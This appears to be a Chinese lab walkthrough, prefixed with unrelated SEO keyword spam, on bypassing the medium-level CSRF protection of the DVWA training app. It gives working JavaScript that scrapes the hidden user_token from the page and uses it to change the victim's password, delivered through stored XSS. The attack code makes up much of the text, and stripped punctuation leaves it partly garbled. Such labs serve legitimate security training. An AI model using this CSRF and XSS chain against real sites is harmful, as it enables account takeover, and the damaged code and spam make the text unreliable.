网站跟域名是什么关系,网站建设目的及功能定位,做竞品分析去哪个网站,百度下载安装官方下载1#xff09;回顾low级别做过csrf页面的密码重置#xff0c;重复之前的操作#xff0c;我们发现级别调整中级之后#xff0c;报错如下 2#xff09;检查源码 进入dvwa源码#xff0c;查找到checktoken#xff1a; 3#xff09;在dvwa-csrf页面上#xff0c;抓包
http…1回顾low级别做过csrf页面的密码重置重复之前的操作我们发现级别调整中级之后报错如下 2检查源码 进入dvwa源码查找到checktoken 3在dvwa-csrf页面上抓包
http://192.168.190.133/DVWA/vulnerabilities/csrf/?password_new111password_conf111ChangeChangeuser_token37c60bfd2e65393503743034bb6b3f8f#4发现参数中有user_token所以就去查看页面元素发现了一个隐藏的input 不停地访问并且抓包追溯token生成的过程
session_token csrf的响应结果user_token payload如果你要绕过你的change请求就需要携带有效的token 6设计绕过
let tokenURL http://192.168.190.133/DVWA/vulnerabilities/csrf/
var count 0;
xmlHttp new XMLHttpRequest()xmlHttp.onreadystatechange function(){if(xmlHttp.readyState 4 xmlHttp.status 200){// 取得请求的响应并从响应中通过正则提取Tokenvar res xmlHttp.responseText;// input typehidden nameuser_token valuecda6d797b42a685a1ec034a52a578956 /var reg_obj new RegExp(input typehidden nameuser_token value(.?) /) var match reg_obj.exec(res)[1]; alert(match);// var regex /user_token\ value\\(.*?)\ \/\/; // var match text.match(regex);var token match;var changeUrl http://192.168.190.133/DVWA/vulnerabilities/csrf/?user_tokentokenpassword_new999password_conf999ChangeChange;if (count 0) {count 1; // 只发送一次否则会多次发送xmlHttp.open(GET,changeUrl,false); // false 代表同步方式发送xmlHttp.send();}}
}xmlHttp.open(GET,tokenURL, false);
xmlHttp.send();
通过xss-store注入js脚本
8登录后访问xss-store触发js